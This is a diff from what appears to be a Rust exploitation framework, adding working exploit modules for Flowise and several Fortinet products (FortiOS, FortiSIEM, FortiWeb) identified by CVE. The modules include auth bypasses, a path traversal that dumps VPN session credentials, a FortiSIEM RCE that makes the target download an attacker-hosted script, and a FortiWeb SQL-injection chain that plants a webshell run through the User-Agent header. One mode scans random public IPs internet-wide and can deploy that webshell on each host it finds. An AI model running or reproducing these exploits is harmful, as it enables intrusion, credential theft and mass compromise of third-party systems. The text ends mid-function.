let check_url = format!("{}/API/V1/credentials", url);
println!("[*] Checking {}...", check_url.cyan());
let resp = client.get(&check_url).send().await?;
if resp.status().is_success() {
let text = resp.text().await?;
if text.contains("credentialName") && text.contains("updatedDate") {
println!("{}", "[+] Target is VULNERABLE! Credentials exposed.".green().bold());
println!("[+] Response preview: {:.200}...", text);
} else {
println!("{}", "[-] Endpoint accessible but content doesn't match expected leak.".yellow());
}
} else {
println!("{}", "[-] Request failed or credentials protected.".red());
}
Ok(())
}
fn display_banner() {
println!("{}", "Flowise Authentication Bypass (CVE-2024-31621)".green().bold());
}
@@ -10,7 +10,7 @@ use crate::utils::escape_js_command;
use reqwest::Client;
use serde_json::json;
use std::time::Duration;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::io::Write;
/// Displays module banner
fn banner() {
@@ -161,33 +161,27 @@ pub async fn run(target: &str) -> Result<()> {
let mut command = String::new();
print!("{}", "Email: ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut email)
.await
.context("Failed to read email")?;
print!("{}", "Password: ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut password)
.await
.context("Failed to read password")?;
print!("{}", "Command to execute: ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut command)
.await
.context("Failed to read command")?;
let email = email.trim();
+1
View File
@@ -1,2 +1,3 @@
pub mod cve_2025_59528_flowise_rce;
pub mod cve_2024_31621;
@@ -0,0 +1,96 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use serde_json::Value;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target};
/// FortiOS/FortiProxy/FortiSwitchManager Auth Bypass (CVE-2022-40684)
///
/// Authentication bypass on the administrative interface via specific HTTP headers,
/// allowing access to the API.
///
/// Headers:
/// User-Agent: Report Runner
/// Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000"
///
/// Target: /api/v2/cmdb/system/admin (to dump admin users)
pub async fn run(target: &str) -> Result<()> {
print_banner();
// Determine target URL
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// This vulnerability is typically on the management interface (HTTPS).
let base_url = if target_ip.contains("://") {
target_ip.clone()
} else {
format!("https://{}", target_ip)
};
println!("{} Target: {}", "[*]".blue(), base_url);
// We try to fetch the list of admin users
let api_endpoint = format!("{}/api/v2/cmdb/system/admin", base_url.trim_end_matches('/'));
println!("{} Attempting Authentication Bypass...", "[*]".blue());
println!("{} Sending request to Config API...", "[*]".blue());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(10))
.build()?;
let res = client.get(&api_endpoint)
.header("User-Agent", "Report Runner")
.header("Forwarded", "for=\"[127.0.0.1]:8000\";by=\"[127.0.0.1]:9000\"")
.send()
.await
.context("Failed to send request")?;
let status = res.status();
let text = res.text().await?;
if status.is_success() {
println!("{} Request successful (HTTP 200)!", "[+]".green());
println!("{} Bypass worked! Validating output...", "[*]".green());
// Parse JSON output
match serde_json::from_str::<Value>(&text) {
Ok(v) => {
// If it's a valid Forti OS API response, it often has a "results" array
if let Some(results) = v.get("results") {
println!("{} Admin Users Found:\n{:#}", "[+]".green(), results);
} else if let Some(_key) = v.get("vdom") {
// Another potential indication of success
println!("{} API Response (Full):\n{:#}", "[+]".green(), v);
} else {
// Fallback
println!("{} Raw Response:\n{}", "[*]".blue(), text);
}
},
Err(_) => {
println!("{} Response is not valid JSON (might be HTML login page?):", "[-]".yellow());
println!("{}", text.chars().take(500).collect::<String>());
}
}
} else {
println!("{} Request failed with status: {}", "[-]".red(), status);
println!("{} This might mean the target is patched or not FortiOS.", "[*]".yellow());
// Sometimes 403 or 401 is returned even if headers are there, meaning patch is applied.
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FortiOS Authentication Bypass (CVE-2022-40684) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,108 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target};
/// FortiOS SSL VPN Path Traversal (CVE-2018-13379)
///
/// Exploits a path traversal in the FortiOS SSL VPN web portal to leak the
/// session file which contains cleartext credentials.
///
/// Target: /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
pub async fn run(target: &str) -> Result<()> {
print_banner();
// Determine target URL
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// Typically runs on port 10443 or 443 depending on config, but standard PoCs often try https logic
// We will assume standard https port or user provided port in target
// If target has no port, normalize_target adds none (if raw was just IP).
// Let's ensure schema.
let base_url = if target_ip.contains("://") {
target_ip.clone()
} else {
format!("https://{}", target_ip) // Default to HTTPS
};
println!("{} Target: {}", "[*]".blue(), base_url);
// Construct payload
// The vulnerability is in the `lang` parameter.
// We need to bypass some sanitization hence the multiple slashes in some variants,
// but the standard known working payload is usually:
// /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
let payload_path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession";
let full_url = format!("{}{}", base_url.trim_end_matches('/'), payload_path);
println!("{} Sending malicious request...", "[*]".blue());
println!("{} URL: {}", "[*]".blue(), full_url);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(10))
.build()?;
let res = client.get(&full_url)
.send()
.await
.context("Failed to send request")?;
let status = res.status();
if status.is_success() {
// If successful, the body should contain the binary content of the session file.
// It often contains ASCII strings combined with binary data.
let bytes = res.bytes().await?;
println!("{} Request successful (HTTP 200)!", "[+]".green());
println!("{} Checking for session data...", "[*]".blue());
// Simple heuristic: check if it looks like a valid response (not just a login page ignoring the param)
// The file usually starts with some binary structure but contains "var fgt_lang =" if getting the JS?
// No, if vulnerable, we get the actual file `sslvpn_websession`.
// A common false positive is returning the login page.
// Login pages usually contain "<html>" or "<!DOCTYPE html>".
// The binary file shouldn't.
// We will print the hex dump or strings found.
let body_str = String::from_utf8_lossy(&bytes);
if body_str.contains("<html>") || body_str.contains("<!DOCTYPE") {
println!("{} Response looks like a standard HTML page. Exploit likely failed.", "[-]".yellow());
return Ok(());
}
println!("{} Possible Credential Dump:", "[+]".green().bold());
// Print printable characters to help identify user/pass
let printable: String = body_str.chars()
.filter(|c| c.is_ascii_graphic() || c.is_ascii_whitespace())
.collect();
println!("{}", "---------------------------------------------------".cyan());
println!("{}", printable);
println!("{}", "---------------------------------------------------".cyan());
println!("{} Look for username/password patterns in the output above.", "[*]".yellow());
} else {
println!("{} Request failed with status: {}", "[-]".red(), status);
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FortiOS SSL VPN Path Traversal (CVE-2018-13379) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,180 @@
use anyhow::{Result, Context};
use colored::*;
use tokio::net::TcpStream;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio_rustls::rustls::{ClientConfig, RootCertStore, pki_types::ServerName};
use tokio_rustls::TlsConnector;
use std::sync::Arc;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// FortiSIEM Unauthenticated RCE (CVE-2025-64155)
///
/// 1:1 Port from Horizon3.ai PoC
/// Target: FortiSIEM phMonitor service (port 7900)
/// Logic: Argument injection via XML payload in custom binary protocol over SSL.
/// Payload: Overwrites /opt/charting/redishb.sh via curl -o injection.
pub async fn run(target: &str) -> Result<()> {
print_banner();
// Determine target
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// PoC uses port 7900 default
let port = 7900;
println!("{} Target: {}:{}", "[*]".blue(), target_ip, port);
// Warning about destructiveness
println!("{}", "WARNING: This exploit is DESTRUCTIVE.".red().bold());
println!("{}", "It overwrites /opt/charting/redishb.sh on the target.".red());
println!("{}", "It executes a command via curl argument injection.".red());
let lhost = prompt_default("LHOST (Your IP) for payload download", "127.0.0.1")?;
let lport = prompt_default("LPORT (Your Web Server Port)", "8000")?;
let filename = "redishb.sh";
println!("{} Ensure you are hosting a malicious '{}' at http://{}:{}/{}", "[*]".yellow(), filename, lhost, lport, filename);
println!("{} The exploit will force the target to download this file and overwrite /opt/charting/redishb.sh", "[*]".yellow());
let payload_url = format!("http://{}:{}/{}", lhost, lport, filename);
let injection = format!("http://{}:{} --next -o /opt/charting/redishb.sh {}", lhost, lport, payload_url);
// Construct payload per PoC
let xml_payload = format!(
r#"<TEST_STORAGE type="elastic">
<client_type>javaTransportClient</client_type>
<cluster_name>test_name</cluster_name>
<cluster_ip>127.0.0.1</cluster_ip>
<cluster_url>{}</cluster_url>
<java_port>5555</java_port>
<http_port>4444</http_port>
<number_of_shards>3</number_of_shards>
<number_of_replicas>4</number_of_replicas>
<elasticsearch_service_type>test_type</elasticsearch_service_type>
<username>testuser</username>
<password>testpass</password>
</TEST_STORAGE>"#, injection);
// TLS Setup
let root_store = RootCertStore::empty();
let mut config = ClientConfig::builder()
.with_root_certificates(root_store)
.with_no_client_auth();
// Allow invalid certs (dangerous but necessary for exploits)
#[derive(Debug)]
struct NoVerify;
impl tokio_rustls::rustls::client::danger::ServerCertVerifier for NoVerify {
fn verify_server_cert(
&self,
_end_entity: &tokio_rustls::rustls::pki_types::CertificateDer<'_>,
_intermediates: &[tokio_rustls::rustls::pki_types::CertificateDer<'_>],
_server_name: &ServerName<'_>,
_ocsp_response: &[u8],
_now: tokio_rustls::rustls::pki_types::UnixTime,
) -> Result<tokio_rustls::rustls::client::danger::ServerCertVerified, tokio_rustls::rustls::Error> {
Ok(tokio_rustls::rustls::client::danger::ServerCertVerified::assertion())
}
fn verify_tls12_signature(
&self,
_message: &[u8],
_cert: &tokio_rustls::rustls::pki_types::CertificateDer<'_>,
_dss: &tokio_rustls::rustls::DigitallySignedStruct,
) -> Result<tokio_rustls::rustls::client::danger::HandshakeSignatureValid, tokio_rustls::rustls::Error> {
Ok(tokio_rustls::rustls::client::danger::HandshakeSignatureValid::assertion())
}
fn verify_tls13_signature(
&self,
_message: &[u8],
_cert: &tokio_rustls::rustls::pki_types::CertificateDer<'_>,
_dss: &tokio_rustls::rustls::DigitallySignedStruct,
) -> Result<tokio_rustls::rustls::client::danger::HandshakeSignatureValid, tokio_rustls::rustls::Error> {
Ok(tokio_rustls::rustls::client::danger::HandshakeSignatureValid::assertion())
}
fn supported_verify_schemes(&self) -> Vec<tokio_rustls::rustls::SignatureScheme> {
vec![
tokio_rustls::rustls::SignatureScheme::RSA_PKCS1_SHA1,
tokio_rustls::rustls::SignatureScheme::ECDSA_SHA1_Legacy,
tokio_rustls::rustls::SignatureScheme::RSA_PKCS1_SHA256,
tokio_rustls::rustls::SignatureScheme::ECDSA_NISTP256_SHA256,
tokio_rustls::rustls::SignatureScheme::RSA_PKCS1_SHA384,
tokio_rustls::rustls::SignatureScheme::ECDSA_NISTP384_SHA384,
tokio_rustls::rustls::SignatureScheme::RSA_PKCS1_SHA512,
tokio_rustls::rustls::SignatureScheme::ECDSA_NISTP521_SHA512,
tokio_rustls::rustls::SignatureScheme::RSA_PSS_SHA256,
tokio_rustls::rustls::SignatureScheme::RSA_PSS_SHA384,
tokio_rustls::rustls::SignatureScheme::RSA_PSS_SHA512,
tokio_rustls::rustls::SignatureScheme::ED25519,
tokio_rustls::rustls::SignatureScheme::ED448,
]
}
}
config.dangerous().set_certificate_verifier(Arc::new(NoVerify));
let connector = TlsConnector::from(Arc::new(config));
let addr = format!("{}:{}", target_ip, port);
println!("{} Connecting to {}...", "[*]".blue(), addr);
let stream = TcpStream::connect(&addr).await.context("Failed to connect to target")?;
// TLS Handshake
let domain = ServerName::try_from(target_ip.as_str())
.map(|n| n.to_owned())
.or_else(|_| ServerName::try_from("example.com").map(|n| n.to_owned()))
.expect("Regex compilation failed");
let mut tls_stream = connector.connect(domain, stream).await.context("TLS handshake failed")?;
// Construct Packet manually using to_le_bytes
// Header: 156 (u32), len (u32), 1075724911 (u32), 0 (u32)
// Payload: xml string
let payload_bytes = xml_payload.as_bytes();
let payload_len = payload_bytes.len() as u32;
let mut packet = Vec::new();
packet.extend_from_slice(&156u32.to_le_bytes()); // Packet type?
packet.extend_from_slice(&payload_len.to_le_bytes()); // Payload length
packet.extend_from_slice(&1075724911u32.to_le_bytes()); // Magic?
packet.extend_from_slice(&0u32.to_le_bytes()); // Padding?
packet.extend_from_slice(payload_bytes);
println!("{} Sending payload ({} bytes)...", "[*]".blue(), packet.len());
println!("{} Payload:\n{}", "[*]".blue(), xml_payload);
tls_stream.write_all(&packet).await.context("Failed to send payload")?;
// Read response
let mut buf = vec![0u8; 1024];
// Set timeout for read
let read_result = tokio::time::timeout(Duration::from_secs(5), tls_stream.read(&mut buf)).await;
match read_result {
Ok(Ok(n)) => {
if n > 0 {
// PoC output: "Recevied: b'\x00\x00\x00\x00'" or similar?
println!("{} Response received: {:?}", "[+]".green(), &buf[..n]);
println!("{} Exploit sent successfully.", "[+]".green());
} else {
println!("{} Connection closed or empty response.", "[*]".yellow());
}
},
Ok(Err(e)) => println!("{} Error reading response: {}", "[-]".red(), e),
Err(_) => println!("{} Read timed out (expected if no response).", "[*]".yellow()),
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FortiSIEM RCE (CVE-2025-64155) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,123 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use serde_json::json;
use std::time::Duration;
use urlencoding::encode;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// FortiWeb Authenticated OS Command Injection (CVE-2021-22123)
///
/// Exploits a command injection in the SAML Server configuration.
/// Requires valid credentials.
///
/// API: /api/v2/cmdb/user/saml-user
/// Param: server-name (vulnerable to backticks `)
pub async fn run(target: &str) -> Result<()> {
print_banner();
// Determine target URL
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
let base_url = format!("https://{}", target_ip);
println!("{} Target: {}", "[*]".blue(), base_url);
// Credentials
let username = prompt_default("Username", "admin")?;
let password = prompt_required("Password")?;
// Connect and Login (to get token/cookies)
// Note: FortiWeb login process usually involves /api/v2/token or similar
// We will attempt a generic login flow or specific endpoints if known
//
// Usually: POST /logincheck w/ username/secretkey
// Or if it's the new API: POST /api/v2/auth/login
println!("{} Attempting login...", "[*]".blue());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.cookie_store(true) // Enable cookies
.timeout(Duration::from_secs(15))
.build()?;
// Attempt standard login first
let login_url = format!("{}/logincheck", base_url);
// Manual form construction to avoid dependency issues with .form()
let body = format!("username={}&secretkey={}", encode(&username), encode(&password));
let res = client.post(&login_url)
.header("Content-Type", "application/x-www-form-urlencoded")
.body(body)
.send()
.await
.context("Login request failed")?;
// Check if login succeeded (cookies should be set)
// We can also verify by hitting an authenticated endpoint or checking response text
// FortiWeb typically returns simple text or redirect on success.
if !res.status().is_success() {
println!("{} Login failed (Status: {}). Check credentials.", "[-]".red(), res.status());
// Could assume failure but let's try to proceed if maybe cookies set anyway?
// No, likely failed.
return Ok(());
}
// Payload
let cmd = prompt_default("Command to execute", "id")?;
// We need to inject command in `server-name` inside backticks
// Example: `id`
// But we need to make it a valid string for the rest of the command?
// The vuln is specifically in the name field.
//
// Payload construction:
// server-name: "test`" + cmd + "`"
println!("{} Sending exploit payload...", "[*]".blue());
let exploit_url = format!("{}/api/v2/cmdb/user/saml-user", base_url);
let payload = json!({
"server-name": format!("test`{}`", cmd),
"entity-id": "http://test.com",
"idp-entity-id": "http://test.com",
"idp-single-sign-on-url": "http://test.com",
"idp-single-logout-url": "http://test.com",
"idp-cert": "Factory" // Usually requires a cert name, 'Factory' often exists
});
let res = client.post(&exploit_url)
.json(&payload)
.header("Content-Type", "application/json")
.header("X-CSRF-TOKEN", "") // Some versions need CSRF token found in cookies/html, might be tricky
.send()
.await;
match res {
Ok(r) => {
// RCE might be blind or reflected in error/response.
// If blind, we need OOB.
// If reflected, print body.
println!("{} Exploit sent. Status: {}", "[+]".green(), r.status());
let body = r.text().await.unwrap_or_default();
println!("{} Response: {}", "[*]".blue(), body);
},
Err(e) => println!("{} Exploit request failed: {}", "[-]".red(), e),
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FortiWeb Authenticated Command Injection (CVE-2021-22123) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,568 @@
//! CVE-2025-25257 - FortiWeb SQLi to RCE Exploit
//! ==============================================
//!
//! DISCLAIMER:
//! This module is provided for AUTHORIZED security testing and educational purposes ONLY.
//! Unauthorized access to computer systems is illegal.
//!
//! Original PoC: TheStingR (https://github.com/TheStingR/CVE-2025-25257)
//! Ported to Rust for rustsploit framework
//!
//! CVE: CVE-2025-25257
//! Vuln Type: SQL Injection (Unauthenticated) -> Remote Code Execution
//! Affected: FortiWeb <= 7.0.10 / 7.2.10 / 7.4.7 / 7.6.3
//!
//! Attack chain:
//! 1. SQL injection via Authorization header in /api/fabric/device/status
//! 2. Create helper table to assemble payload
//! 3. Write webshell to filesystem via SELECT INTO OUTFILE
//! 4. Write .pth trigger to execute chmod on webshell
//! 5. Trigger .pth execution via Python CGI script
//! 6. Execute commands via User-Agent header in webshell
use anyhow::{anyhow, Context, Result};
use colored::*;
use rand::Rng;
use reqwest::Client;
use std::net::{IpAddr, Ipv4Addr};
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use std::time::Duration;
use std::io::Write;
use tokio::sync::Semaphore;
use tokio::sync::mpsc;
use tokio::fs::OpenOptions;
use tokio::io::AsyncWriteExt;
use chrono::Local;
use crate::utils::normalize_target;
const DEFAULT_TIMEOUT_SECS: u64 = 15;
const MASS_SCAN_CONCURRENCY: usize = 100;
const MASS_SCAN_PORT: u16 = 443; // FortiWeb usually https
// Bogon/Private/Reserved exclusion ranges
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32", "8.8.8.8/32", "8.8.4.4/32",
];
const AGGRESSIVE_PAYLOADS: &[&str] = &[
"SELECT/**/1;--",
"SELECT/**/sleep(5);--",
"SELECT/**/user();--",
"SELECT/**/version();--",
"UNION/**/SELECT/**/1;--",
"OR/**/1=1;--",
"ORDER/**/BY/**/1;--",
"AND/**/1=1;--",
"SELECT/**/count(*);--",
"BENCHMARK(1000000,MD5(1));--"
];
#[derive(Clone, Copy, Debug)]
enum ScanMode {
StandardSQLi,
UnsafeRCE,
AggressiveProbe,
CustomInjection,
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
if !exclusions.iter().any(|net| net.contains(ip_addr)) {
return ip_addr;
}
}
}
/// Display module banner
fn display_banner() {
println!(
"{}",
"╔═══════════════════════════════════════════════════════════╗".cyan()
);
println!(
"{}",
"║ FortiWeb SQLi to RCE - CVE-2025-25257 ║".cyan()
);
println!(
"{}",
"║ Vuln: SQL Injection (Unauthenticated) -> RCE ║".cyan()
);
println!(
"{}",
"║ Target: FortiWeb <= 7.0.10/7.2.10/7.4.7/7.6.3 ║".cyan()
);
println!(
"{}",
"║ Original PoC: TheStingR - Ported to Rust ║".cyan()
);
println!(
"{}",
"╚═══════════════════════════════════════════════════════════╝".cyan()
);
}
// Local normalize_target removed
/// FortiWeb SQLi to RCE Exploit Client
struct FortiWebExploit {
client: Client,
base_url: String,
buggy_api: String,
pyhook_path: String,
webshell_path: String,
pth_path: String,
webshell_content: String,
chmod_script: String,
}
impl FortiWebExploit {
fn new(base_url: &str) -> Result<Self> {
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()
.context("Failed to build HTTP client")?;
// Simple sh webshell: executes commands from the User-Agent header
let webshell_content = "#!/bin/sh -- \r\n\
printf \"Content-Type: text/html\\r\\n\";printf \"\\r\\n\";eval $HTTP_USER_AGENT"
.to_string();
// Python script to chmod the webshell and clean up the .pth file
let chmod_script = "import os # \r\n\
os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #"
.to_string();
Ok(Self {
client,
base_url: normalize_target(base_url)?,
buggy_api: "/api/fabric/device/status".to_string(),
pyhook_path: "/cgi-bin/ml-draw.py".to_string(),
webshell_path: "/migadmin/cgi-bin/x.cgi".to_string(),
pth_path: "/var/log/lib/python3.10/pylab.py".to_string(),
webshell_content,
chmod_script,
})
}
/// Sends a GET request with crafted Authorization header to inject SQL
/// Returns true if the response status is 401 (expected for successful injection)
async fn inject_sql(&self, injection: &str) -> Result<bool> {
let url = format!("{}{}", self.base_url, self.buggy_api);
let auth_header = format!("Bearer ';{}", injection);
let response = self
.client
.get(&url)
.header("Authorization", auth_header)
.send()
.await
.context("SQL injection request failed")?;
Ok(response.status().as_u16() == 401)
}
/// Drops and recreates a helper table for payload assembly
async fn prepare_table(&self) -> Result<()> {
// println!("{}", "[*] Preparing helper table...".cyan()); // Silent in mass scan
self.inject_sql("DROP/**/TABLE/**/fabric_user.a;--").await?;
self.inject_sql("CREATE/**/TABLE/**/fabric_user.a/**/(a/**/TEXT);--")
.await?;
self.inject_sql("INSERT/**/INTO/**/fabric_user.a/**/VALUES('');--")
.await?;
Ok(())
}
/// Chunks the payload into 16-byte pieces, hex-encodes, and appends to table via SQLi
async fn write_payload(&self, payload: &str) -> Result<()> {
let parts: Vec<&str> = payload
.as_bytes()
.chunks(16)
.map(|chunk| std::str::from_utf8(chunk).unwrap_or(""))
.collect();
for part in parts {
let hexed = hex::encode(part.as_bytes());
// println!("{}", format!("[*] Writing part: {}", part).dimmed());
let injection = format!(
"USE/**/fabric_user;UPDATE/**/a/**/SET/**/a=(SELECT/**/CONCAT(a,0x{})/**/FROM/**/a);--",
hexed
);
self.inject_sql(&injection).await?;
}
Ok(())
}
/// Uses SELECT ... INTO OUTFILE to write the payload to the specified path
async fn write_file(&self, path: &str, escape_quote: bool) -> Result<()> {
let esc = if escape_quote { "''" } else { "'" };
let injection = format!(
"SELECT/**/a/**/FROM/**/fabric_user.a/**/INTO/**/OUTFILE/**/'{}'/**/FIELDS/**/ESCAPED/**/BY/**/{};--",
path, esc
);
self.inject_sql(&injection).await?;
Ok(())
}
/// Triggers the .pth file by accessing a Python CGI script
async fn trigger_chmod(&self) -> Result<bool> {
// println!("{}", "[*] Triggering .pth execution...".cyan());
let url = format!("{}{}", self.base_url, self.pyhook_path);
match self.client.get(&url).send().await {
Ok(resp) => Ok(resp.status().as_u16() == 500),
Err(_) => {
// println!("{}", format!("[!] Trigger failed: {}", e).yellow());
Ok(false)
}
}
}
/// Main attack: Write webshell and .pth trigger, then chmod via trigger
async fn upload_webshell(&self) -> Result<bool> {
// Step 1: Write webshell
self.prepare_table().await?;
self.write_payload(&self.webshell_content.clone()).await?;
// println!("{}", "[>] Writing webshell...".green());
self.write_file(&self.webshell_path.clone(), true).await?;
// Step 2: Write chmod trigger (.pth file)
self.prepare_table().await?;
self.write_payload(&self.chmod_script.clone()).await?;
// println!("{}", "[>] Deploying chmod trigger...".green());
self.write_file(&self.pth_path.clone(), false).await?;
// Step 3: Trigger execution
let success = self.trigger_chmod().await?;
Ok(success)
}
/// Execute a command via the deployed webshell
async fn run_cmd(&self, cmd: &str) -> Result<String> {
let url = format!("{}{}", self.base_url, self.webshell_path);
let response = self
.client
.get(&url)
.header("User-Agent", cmd)
.send()
.await
.context("Command execution failed")?;
let output = response.text().await.unwrap_or_default();
Ok(output)
}
/// Get the webshell URL for the user
fn get_webshell_url(&self) -> String {
format!("{}/cgi-bin/x.cgi", self.base_url)
}
}
/// Quick vulnerability check for mass scanning
async fn quick_check(ip: &str, mode: ScanMode, custom_payload: &str) -> bool {
let host_port = format!("https://{}:{}", ip, MASS_SCAN_PORT);
if let Ok(exploit) = FortiWebExploit::new(&host_port) {
match mode {
ScanMode::StandardSQLi => {
match exploit.inject_sql("SELECT/**/1;--").await {
Ok(true) => true,
_ => false,
}
},
ScanMode::UnsafeRCE => {
// Try full webshell upload
exploit.upload_webshell().await.unwrap_or(false)
},
ScanMode::AggressiveProbe => {
for payload in AGGRESSIVE_PAYLOADS {
if let Ok(true) = exploit.inject_sql(payload).await {
return true;
}
}
false
},
ScanMode::CustomInjection => {
match exploit.inject_sql(custom_payload).await {
Ok(true) => true,
_ => false,
}
}
}
} else {
false
}
}
/// Mass scan mode
async fn run_mass_scan() -> Result<()> {
display_banner();
println!("{}", "[*] Mass Scan Mode: 0.0.0.0/0".yellow().bold());
println!("{}", "[*] Honeypot detection: DISABLED".yellow());
println!("{}", format!("[*] Concurrency: {}", MASS_SCAN_CONCURRENCY).cyan());
// Prompt for exclusions
print!("{}", "[?] Exclude reserved/private ranges? [Y/n]: ".cyan());
std::io::stdout().flush()?;
let mut excl_choice = String::new();
std::io::stdin().read_line(&mut excl_choice)?;
let use_exclusions = !matches!(excl_choice.trim().to_lowercase().as_str(), "n" | "no");
let mut exclusions = Vec::new();
if use_exclusions {
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusions.push(net);
}
}
}
let exclusions = Arc::new(exclusions);
// Prompt for Output File
print!("{}", "[?] Output File (default: fortiweb_hits.txt): ".cyan());
std::io::stdout().flush()?; // Use std::io for flush/read
let mut outfile = String::new();
std::io::stdin().read_line(&mut outfile)?;
let outfile = outfile.trim();
let outfile = if outfile.is_empty() { "fortiweb_hits.txt" } else { outfile };
let outfile = outfile.to_string();
// Prompt for Payload Mode
println!("{}", "[?] Select Payload Mode:".cyan());
println!(" 1. Standard SQLi Check (Safe)");
println!(" 2. Unsafe RCE Verification (Full Rewrite)");
println!(" 3. Aggressive Probe (Top 10 Payloads)");
println!(" 4. Custom Injection String");
print!("{}", "Select option [1-4] (default 1): ".cyan());
std::io::stdout().flush()?;
let mut mode_str = String::new();
std::io::stdin().read_line(&mut mode_str)?;
let mode = match mode_str.trim() {
"2" => ScanMode::UnsafeRCE,
"3" => ScanMode::AggressiveProbe,
"4" => ScanMode::CustomInjection,
_ => ScanMode::StandardSQLi,
};
let mut custom_payload = String::new();
if let ScanMode::CustomInjection = mode {
print!("{}", "[?] Enter Custom SQLi Payload: ".cyan());
std::io::stdout().flush()?;
std::io::stdin().read_line(&mut custom_payload)?;
custom_payload = custom_payload.trim().to_string();
}
let custom_payload = Arc::new(custom_payload);
let semaphore = Arc::new(Semaphore::new(MASS_SCAN_CONCURRENCY));
let checked = Arc::new(AtomicUsize::new(0));
let found = Arc::new(AtomicUsize::new(0));
// Result writer channel
let (tx, mut rx) = mpsc::unbounded_channel::<String>();
// Writer task
let outfile_clone = outfile.clone();
tokio::spawn(async move {
let mut file = OpenOptions::new()
.create(true)
.append(true)
.open(&outfile_clone)
.await
.expect("Failed to open output file");
while let Some(result) = rx.recv().await {
if let Err(e) = file.write_all(result.as_bytes()).await {
eprintln!("[-] Failed to write result: {}", e);
}
}
});
let c = checked.clone();
let f = found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(10)).await;
println!("[*] Checked: {} | Found: {}", c.load(Ordering::Relaxed), f.load(Ordering::Relaxed));
}
});
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let chk = checked.clone();
let fnd = found.clone();
let tx = tx.clone();
let cp = custom_payload.clone();
let current_mode = mode;
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
let ip_str = ip.to_string();
if quick_check(&ip_str, current_mode, &cp).await {
println!("{}", format!("[+] VULNERABLE: {}", ip_str).green().bold());
fnd.fetch_add(1, Ordering::Relaxed);
let timestamp = Local::now().format("%Y-%m-%d %H:%M:%S").to_string();
let log_entry = format!("{} - {}\n", ip_str, timestamp);
let _ = tx.send(log_entry);
}
chk.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
}
fn prompt_input_std(msg: &str) -> Result<String> {
print!("{}", msg);
std::io::stdout().flush()?;
let mut input = String::new();
std::io::stdin().read_line(&mut input)?;
Ok(input.trim().to_string())
}
pub async fn run(target: &str) -> Result<()> {
